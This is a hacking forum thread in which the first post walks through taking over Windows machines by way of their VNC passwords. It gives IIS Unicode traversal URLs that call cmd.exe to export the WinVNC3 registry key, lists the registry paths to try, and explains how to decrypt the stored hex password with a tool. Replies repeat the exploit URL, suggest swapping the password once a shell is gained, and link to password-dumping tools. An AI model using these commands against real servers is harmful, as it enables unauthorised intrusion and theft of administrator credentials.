hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Nikscap
How to Decrypt VNC password through vulnerabilities, and gain full control of the machine ???

About 70 % of time the session was not locked and it's very easy to enter cool.gif and ~ 50 % of VNC password are the same to Administrator password ! ( or router, etc ... )

With this solution it's possible to take the hand several times where you did not have other solutions !!!

Don' t forget, Training like you fight ph34r.gif , let's go !

[1] - Unicode

Exctract the VNC key

CODE
.../winnt/system32/cmd.exe?/c+regedit+/e+c:/vnc.reg+HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default


View the Key like this

CODE
../winnt/system32/cmd.exe?/c+type+c:\vnc.reg


Now we can show the password in hexa

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
blablabla.....blablabla.....
"Password"=hex:27,8a,e1,7c,28,3f,8e,b7
blablabla.....blablabla.....

for decrypt the pass wa have many solutions , but the more easy it's to download this tool :VNcon


Go to menu password --> Decrypt password --> Copy the password in hexa, and delete all the " , " characters like this 278ae17c283f8eb7 = toto blink.gif


[2] - SQL, WebDav, etc ...


It's the same request ! ( but it's for finish the exemple ... )


CODE
regedit /e c:/vnc.reg HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default


And

CODE
Type c:/vnc.reg



# Warning ! The path for extract the key can change according to the version ( + OR - New), I write all the possibilies you can found !

CODE
A - HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default
B - HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3
C - HKEY_USERS\.DEFAULT\SOFTWARE\ORL\WinVNC3


I hope this way my explaining it is clear !

Link about this : VNC use weak password protection mechanism
DJVASTVASTY2K
How Does This Method Work ??

I Tryed The Commands But No Success sad.gif

Please Can You Elaborate

Thank You

Best Regards

Adam

Vast Gsm
w00dy
Its unicode, so the server must be vulnerable and must be ran in the brwoser.. IE
CODE
http://www.whateverserver.com/.../winnt/system32/cmd.exe?/c+regedit+/e+c:/vnc.reg+HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default
Andy
....as long as u have priviledge to viewing registry u can get vnc pass ez.
yuliang11
this seems like a local exploits. what about vpn ? anyone knows anything about it
jeroen
thanks for sharing man

this can be come handy sometimes
Flinston
yeah this could me handy ... but you have to find IIS Unicode vulnerable MS Servers ...
Yorn
Just get commandline access and run:

"regedit /e c:/vnc.reg HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3"

then view the contents of vnc.reg

actually, if you wanted to change it, you could change it to an encoded one that you already had on your machine.
Fantafour
Anyone got a succesfull injection ?


still problems...
320X
maybe it helpīs you
http://www.securiteam.com/exploits/6S0040A6AW.html
VIXVVXIV
thanks for sharing man biggrin.gif

VIXVVXIV ph34r.gif
tolf

VNCPWDUMP..
http://www.securiteam.com/tools/5KP0F2A9QG.html
ganz2
very cool
PuPPaFiSH
Thx for the info fella, I'll check it out.
Orangey
Yes, This is a Local Exploit. But useful if you forget your password smile.gif

rolleyes.gif
net_runner
very interesting the combo iis+vnc, thankz
batigoooal
another very usefull tools for decrypt vnc password is vncon :

http://vncon.chronetal.co.uk/

You put the crypted key in the software and he would decrypt password automaticly for you,

See ya,
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.